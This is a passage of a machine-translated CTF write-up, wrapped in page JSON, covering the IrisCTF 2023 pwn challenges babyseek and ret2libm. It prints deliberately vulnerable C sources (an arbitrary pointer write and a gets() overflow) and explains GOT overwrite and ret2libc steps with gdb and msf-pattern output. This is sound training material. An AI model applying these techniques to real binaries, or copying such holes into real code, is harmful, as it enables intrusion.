{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-irisctf-2023-en","result":{"data":{"markdownRemark":{"id":"8e1f2d81-4719-518f-aabf-22d61a8c266b","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-irisctf-2023\">original page</a>.</p>\n</blockquote>\n<p>Happy New Year.</p>\n<p>We participated in <a href=\"https://2023.irisc.tf/home\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">IrisCTF 2023</a> as our first CTF of 2023, while also welcoming new members to 0neP@dding.</p>\n<p>As usual, I will briefly summarize only the parts that taught me something in this writeup.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#pwn\">Pwn</a></p>\n<ul>\n<li><a href=\"#babyseek\">babyseek</a></li>\n<li><a href=\"#ret2libm\">ret2libm</a></li>\n</ul>\n</li>\n<li>\n<p><a href=\"#forensics\">Forensics</a></p>\n<ul>\n<li><a href=\"#babyforens\">babyforens</a></li>\n</ul>\n</li>\n<li><a href=\"#conclusion\">Conclusion</a></li>\n</ul>\n<h2 id=\"pwn\" style=\"position:relative;\"><a href=\"#pwn\" aria-label=\"pwn permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Pwn</h2>\n<h3 id=\"babyseek\" style=\"position:relative;\"><a href=\"#babyseek\" aria-label=\"babyseek permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>babyseek</h3>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 652px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/70d47158a3bd423e87fc95d61a29e876/dba9a/image-20230109004518254.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 58.333333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACbklEQVQoz1VSSXLbMBDkXxK7ynEsyZJIcBcpkqI2aiPNTZv3JYdUTklueV4+YOmQqy1f8ojOAKq47ENXoxtNADND6feihj/3OjaXTWxvGDbrGjarKqGCzfIEj9kBHs8+4DH9+B7cyw6xvVWxvTewvZKxmR9D2j7Y+PsrxsvPCC8/+ni+kfF8S7hTsPui42l1jKfygHD4HgV5iyPsvnl4+d7D7quLHX0jRcYpcpchcxWUnoaiYyL3DZQdC3mgIyOdBqR7NvKQPPK5l3ctoRehiazNUFB2YjYg2Y6NJEvgei4UpkAzVDBVgaoxYgaF1kLrDJpOe5pCOVloRhmel0nzTL1Zh2ToMnphG46lw3NNeI4Jv23DsXWCBpe43TIE5EYNPj0g8GxYuoJOu4XQcxBwDhwotC91uz6uz+dYLwtcrkvk2QzrVYHlIsNqnhKXOF+VWJQpVuRdUfb+9gJpMsJk1EeWTBD1O7AMhma9CmlIr+HmbDxAMhsJTCmYJmPEY+IoxGwSIZ4MqRIPLUujSixorIHqySfUKscCfF2vnUAaWSpGgy76XW9/6HRIukOHDDAmXo5DlHmCNB7Bp5ZUPh+hcVoBa56CyXWoSv2VZf7CIGhjUaR0SIhlmWBJZV5dzHFN4BzPIkR0YZ7OqPQCdzfnWM9zuiDCWTxGmU2pkoGokvdbCjttMmP0aTAuDSQk7tJrfd8RjXZpGPx2Hu5RdtgLxIAYeXwwJk2dM4ehypA86mF+NkU3cAUMTYZtqtDVpgjY9Hu0SO8/lslrijX3bBrEf3AtDnQdi6Y1eN3go1dEf/ZQOJp7Zm8gvDfgntyo4h/lwMZhpibYywAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/70d47158a3bd423e87fc95d61a29e876/8ac56/image-20230109004518254.webp 240w,\n/static/70d47158a3bd423e87fc95d61a29e876/d3be9/image-20230109004518254.webp 480w,\n/static/70d47158a3bd423e87fc95d61a29e876/db2ac/image-20230109004518254.webp 652w\"\n              sizes=\"(max-width: 652px) 100vw, 652px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/70d47158a3bd423e87fc95d61a29e876/8ff5a/image-20230109004518254.png 240w,\n/static/70d47158a3bd423e87fc95d61a29e876/e85cb/image-20230109004518254.png 480w,\n/static/70d47158a3bd423e87fc95d61a29e876/dba9a/image-20230109004518254.png 652w\"\n            sizes=\"(max-width: 652px) 100vw, 652px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/70d47158a3bd423e87fc95d61a29e876/dba9a/image-20230109004518254.png\"\n            alt=\"image-20230109004518254\"\n            title=\"image-20230109004518254\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>A challenge binary generated from the following source code was provided.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdlib.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n\n<span class=\"token keyword\">void</span> <span class=\"token function\">win</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">system</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"cat /flag\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span> <span class=\"token operator\">*</span>argv<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token comment\">// This is just setup</span>\n    <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Your flag is located around %p.\\n\"</span><span class=\"token punctuation\">,</span> win<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    FILE<span class=\"token operator\">*</span> null <span class=\"token operator\">=</span> <span class=\"token function\">fopen</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"/dev/null\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">int</span> pos <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">void</span><span class=\"token operator\">*</span> super_special <span class=\"token operator\">=</span> <span class=\"token operator\">&amp;</span>win<span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">fwrite</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"void\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token number\">4</span><span class=\"token punctuation\">,</span> null<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"I'm currently at %p.\\n\"</span><span class=\"token punctuation\">,</span> null<span class=\"token operator\">-></span>_IO_write_ptr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"I'll let you write the flag into nowhere!\\n\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Where should I seek into? \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">&amp;</span>pos<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    null<span class=\"token operator\">-></span>_IO_write_ptr <span class=\"token operator\">+=</span> pos<span class=\"token punctuation\">;</span>\n\n    <span class=\"token comment\">// print &amp; 'exit@got.plt'</span>\n    <span class=\"token function\">fwrite</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>super_special<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> null<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Only the following two lines could change behavior depending on user input, so they gave a clear starting point.</p>\n<p>I knew that the <code class=\"language-text\">null</code> structure was a file descriptor created by <code class=\"language-text\">fopen(\"/dev/null\", \"w\");</code>, so I first investigated what would happen if I could arbitrarily modify <code class=\"language-text\">_IO_write_ptr</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">null<span class=\"token operator\">-></span>_IO_write_ptr <span class=\"token operator\">+=</span> pos<span class=\"token punctuation\">;</span>\n<span class=\"token function\">fwrite</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>super_special<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> null<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p><code class=\"language-text\">_IO_write_ptr</code> is commented as <code class=\"language-text\">Current put pointer</code> in the library source, so it is the member variable that points to the current output position of the buffer.</p>\n<p>By actually creating a file descriptor for <code class=\"language-text\">/dev/stdout</code> and decreasing the value of <code class=\"language-text\">_IO_write_ptr</code>, I confirmed that earlier characters would be overwritten.</p>\n<p>At that point, because I could change the address held in <code class=\"language-text\">_IO_write_ptr</code> arbitrarily, I realized that <code class=\"language-text\">&amp;super_special</code>, which stores the address of the <code class=\"language-text\">win</code> function used to retrieve the flag, could be written to arbitrary memory.</p>\n<p>Looking at the source, we can see that <code class=\"language-text\">exit(0);</code> is called for the first time here.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">fwrite</span><span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>super_special<span class=\"token punctuation\">,</span> <span class=\"token keyword\">sizeof</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">void</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> null<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>In ELF, library functions are lazily bound, so when a function is called for the first time, the corresponding entry in the <code class=\"language-text\">.plt</code> section is referenced and execution jumps through the GOT (<code class=\"language-text\">XXX@got.plt</code>).</p>\n<p>Reference: <a href=\"/linux-got-plt\">Tracing Library Function Calls via GOT/PLT</a></p>\n<p>At that point, by adjusting <code class=\"language-text\">_IO_write_ptr</code> so that the GOT address embedded in the <code class=\"language-text\">.plt</code> entry used when <code class=\"language-text\">exit</code> is called is overwritten with the address of the <code class=\"language-text\">win</code> function, we can retrieve the flag.</p>\n<p>However, to carry out this exploit, we need to identify the relevant address in the <code class=\"language-text\">.plt</code> section used by the process running on the challenge server.</p>\n<p>Fortunately, when the program starts, the following lines leak the addresses of the <code class=\"language-text\">win</code> function and <code class=\"language-text\">null->_IO_write_ptr</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">printf<span class=\"token punctuation\">(</span><span class=\"token string\">\"Your flag is located around %p.<span class=\"token entity\" title=\"\\n\">\\n</span>\"</span>, win<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\nprintf<span class=\"token punctuation\">(</span><span class=\"token string\">\"I'm currently at %p.<span class=\"token entity\" title=\"\\n\">\\n</span>\"</span>, null-<span class=\"token operator\">></span>_IO_write_ptr<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span></code></pre></div>\n<p>At that point, the relative position between the address identified with the <code class=\"language-text\">print &amp; 'exit@got.plt'</code> command in gdb-peda and the address of the <code class=\"language-text\">win</code> function is constant, so we can determine the GOT table address of <code class=\"language-text\">exit</code> from the leaked address of <code class=\"language-text\">win</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">gdb-peda$ print <span class=\"token operator\">&amp;</span> <span class=\"token string\">'exit@got.plt'</span>\n<span class=\"token variable\">$1</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&lt;</span>text from jump slot <span class=\"token keyword\">in</span> .got.plt, no debug info<span class=\"token operator\">></span> *<span class=\"token punctuation\">)</span> 0x555555557468 <span class=\"token operator\">&lt;</span>exit@got<span class=\"token punctuation\">[</span>plt<span class=\"token punctuation\">]</span><span class=\"token operator\">></span></code></pre></div>\n<p>Finally, by providing an input value that changes <code class=\"language-text\">null->_IO_write_ptr</code> so that it points to the identified GOT table address of the <code class=\"language-text\">exit</code> function, I was able to retrieve the flag.</p>\n<h3 id=\"ret2libm\" style=\"position:relative;\"><a href=\"#ret2libm\" aria-label=\"ret2libm permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>ret2libm</h3>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 654px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/d1bd58b11b3c89c81d203d31ede0b190/68e9c/image-20230109004531152.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 42.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB4klEQVQoz5WQ3VLaUBSF8xid6YyOWolQlU4xkl9EQobfFMhJCAlECUEREMfplQ/T274Q6E0reNO7PsTqNmLtbS++WWufc/bZ6xzux9cSHm503EcC7s8/vREcYuHsYE4s1sz/0TnbinseJidYTPN4GmbwzdgA9+vuC57uGlhNc1gOMlhGR1hdHGNJPHp7BI+fnQTBr/1a3V2sRhJWt0U8znT8vlbxvfYBXFuX0MoJYLoM65migmZBAiN1ynmw0gmcyulfb5dyaBkanFIedU2AoyuwCiLKYhppfhNcPwxQrZWhaDK0nAJZkSDJYuxVVYKivHhNozo+I9NaNvaSlKVajXuPhAy2E9vg/DYDa9YQBh20mYmO04TdqsMl9VkdHiXr+i7OPBt+h8HUVVz5DDZroN9zYVaK2E/xED6nkeC3wAV0uFrSYVsmvHYLPY/BtRtwqHbo4sBtwW1b6HYsWI0qPBrUozXfteLBHqlRyEGTs9hL0h+G5z2YVQNRv4vb2QjT8QDTSYTpaIDr8QXGpONRSD7CZRRgckV75GeTIcaXfSKk/T7KxiklpCePhmEc26wYUEXhDemYEGK0Zy++6CuvdayUrpjXkPqYAJcVM9g/4HFwmKTIO3Hs/4WnvmRqF+833+EPARxb8CQbmtEAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/d1bd58b11b3c89c81d203d31ede0b190/8ac56/image-20230109004531152.webp 240w,\n/static/d1bd58b11b3c89c81d203d31ede0b190/d3be9/image-20230109004531152.webp 480w,\n/static/d1bd58b11b3c89c81d203d31ede0b190/d7085/image-20230109004531152.webp 654w\"\n              sizes=\"(max-width: 654px) 100vw, 654px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/d1bd58b11b3c89c81d203d31ede0b190/8ff5a/image-20230109004531152.png 240w,\n/static/d1bd58b11b3c89c81d203d31ede0b190/e85cb/image-20230109004531152.png 480w,\n/static/d1bd58b11b3c89c81d203d31ede0b190/68e9c/image-20230109004531152.png 654w\"\n            sizes=\"(max-width: 654px) 100vw, 654px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/d1bd58b11b3c89c81d203d31ede0b190/68e9c/image-20230109004531152.png\"\n            alt=\"image-20230109004531152\"\n            title=\"image-20230109004531152\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>A challenge binary like the following was provided.</p>\n<p>The binary itself is very simple, and the line <code class=\"language-text\">gets(yours);</code> clearly contains an obvious BoF vulnerability.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;math.h></span></span>\n<span class=\"token macro property\"><span class=\"token directive-hash\">#</span><span class=\"token directive keyword\">include</span> <span class=\"token string\">&lt;stdio.h></span></span>\n<span class=\"token comment\">// gcc -fno-stack-protector -lm</span>\n<span class=\"token keyword\">int</span> <span class=\"token function\">main</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">int</span> argc<span class=\"token punctuation\">,</span> <span class=\"token keyword\">char</span><span class=\"token operator\">*</span> argv<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdin</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">setvbuf</span><span class=\"token punctuation\">(</span><span class=\"token constant\">stdout</span><span class=\"token punctuation\">,</span> <span class=\"token constant\">NULL</span><span class=\"token punctuation\">,</span> _IONBF<span class=\"token punctuation\">,</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">char</span> yours<span class=\"token punctuation\">[</span><span class=\"token number\">8</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Check out my pecs: %p\\n\"</span><span class=\"token punctuation\">,</span> fabs<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"How about yours? \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">gets</span><span class=\"token punctuation\">(</span>yours<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Let's see how they stack up.\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n\n    <span class=\"token keyword\">return</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Also, this time the address of the <code class=\"language-text\">fabs</code> function defined in libm is leaked by <code class=\"language-text\">printf(\"Check out my pecs: %p\\n\", fabs);</code>.</p>\n<p>From there, my plan was to use the leaked address of <code class=\"language-text\">fabs</code> inside libm to determine the address of libc and then get a shell with ret2libc.</p>\n<p>First, to determine how many bytes were required before controlling RSP via the BoF, I used gdb and msf-pattern_offset and found that the offset was 16 bytes.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token comment\"># Use gdb and msf-pattern_offset to determine that the offset needed to control RSP is 16 bytes</span>\n$ msf-pattern_create -l <span class=\"token number\">100</span>\n$ msf-pattern_offset -q a5Aa           \n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> Exact match at offset <span class=\"token number\">16</span></code></pre></div>\n<p>Next, I used <code class=\"language-text\">info sharedlibrary</code> in gdb to inspect the addresses that were loaded at runtime.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ info sharedlibrary\nFrom                To                  Syms Read   Shared Object Library\n0x00007f861b03cf10  0x00007f861b05d550  Yes         /lib64/ld-linux-x86-64.so.2\n0x00007f861aca9a80  0x00007f861ad681d5  Yes         /lib/x86_64-linux-gnu/libm.so.6\n0x00007f861a8ce360  0x00007f861aa46afc  Yes         /lib/x86_64-linux-gnu/libc.so.6\n\n$  x/16c 0x00007f861aca9a80\n0x7f861aca9a80 <span class=\"token operator\">&lt;</span>atan2Mp<span class=\"token operator\">></span>:       0x41    0x57    0x41    0x56    0x4c    0x8d    0xd     0xd5\n\n$ x/16c 0x00007f861a8ce360  \n0x7f861a8ce360 <span class=\"token operator\">&lt;</span>__libgcc_s_init<span class=\"token operator\">></span>:       0x55    0x53    0x48    0x8d    0x3d    0x7d    0x23    0x19</code></pre></div>\n<p><code class=\"language-text\">info sharedlibrary</code> shows, in the <code class=\"language-text\">From</code> column, the addresses where the <code class=\"language-text\">.text</code> sections of the loaded <code class=\"language-text\">libm.so</code> and <code class=\"language-text\">libc.so</code> are placed.</p>\n<p>If we check which functions are located at the relevant <code class=\"language-text\">.text</code> section offsets using Ghidra or readelf, we can confirm that they match the loaded addresses.</p>\n<ul>\n<li><code class=\"language-text\">atan2Mp</code> in <code class=\"language-text\">libm.so</code> (<code class=\"language-text\">0x00007f861aca9a80</code>)</li>\n</ul>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/fd135b2f1e180e7065b8ff4bd327662a/5819f/image-20230109112513881.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 51.25000000000001%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAACXklEQVQoz0WSa08aQRiF+deNab81/WB6MTbVYkWrBQS1oqVRm9RqVQQVFNSCXHfdK7DF5SqCqE8HMOkkT3LmneS8J5njMGv39CmoLbJyA8m4QdLbKKVbtOsuun33H3EfzJ7m2/vHqHqRWvUK27ao1ns4So1H+qjlLgWtiWy0kIS5XrlDvNO4f+IBWo8ChrQFGz9+ks7p1JsNOp06/eMw6vcU6w9IpTp5U6TUO8hWm6RkMre4xqxnlRlPgDl/kPnF78x413CJmXtpneWVNRJJE7NUpGrnabZbOHJqA9XqoJTbg2RpSaQUaaN/CrweG+ft2CTvPziZmPyE27PEgu8rPv8KTpeb2bl58koTqwq9no51o+OQklVUrY1h3SGlbORsDUPtEL/UCB+dcpHKUZB14udJXHMzeBf8uAWuzx6ejTzn3ftZJqYWmHKO8cbpEgnPKyjqDXqpQ1/nhaki3ZBIa+zsHxGKnJAtaOyHY4y8mOTlKy/j44u4pgP4fBssL68T/LZJYDXI9IwXx1WhgWbeYohP6OsruYlhdomnhwlDkRgnidTAeNQVZPTLFh9923iDEeZXf+PfDBP4FWVtN8b8ygYO0+5RrIqPqT1g2vcY1z2sJoOEu6FjtnZCIl2UA2G4Fz5ALRZJF66IJzMkUllRsTKlaptKo0vsPINDt7qY10NTQ+j+vVwbGkaiZ0RPL0hlZA6F3hMLyn/rKFqJpDDL5GQqdoueqJRoFNm8KnrYHPZwgND9ClVEyeKXKomLjOiZMiByfEb48BRZNckVFJKXOS4zErJiohkWRcsWS+P8A29Iu5tnm7deAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/fd135b2f1e180e7065b8ff4bd327662a/8ac56/image-20230109112513881.webp 240w,\n/static/fd135b2f1e180e7065b8ff4bd327662a/d3be9/image-20230109112513881.webp 480w,\n/static/fd135b2f1e180e7065b8ff4bd327662a/e46b2/image-20230109112513881.webp 960w,\n/static/fd135b2f1e180e7065b8ff4bd327662a/20e4c/image-20230109112513881.webp 1042w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/fd135b2f1e180e7065b8ff4bd327662a/8ff5a/image-20230109112513881.png 240w,\n/static/fd135b2f1e180e7065b8ff4bd327662a/e85cb/image-20230109112513881.png 480w,\n/static/fd135b2f1e180e7065b8ff4bd327662a/d9199/image-20230109112513881.png 960w,\n/static/fd135b2f1e180e7065b8ff4bd327662a/5819f/image-20230109112513881.png 1042w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/fd135b2f1e180e7065b8ff4bd327662a/d9199/image-20230109112513881.png\"\n            alt=\"image-20230109112513881\"\n            title=\"image-20230109112513881\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        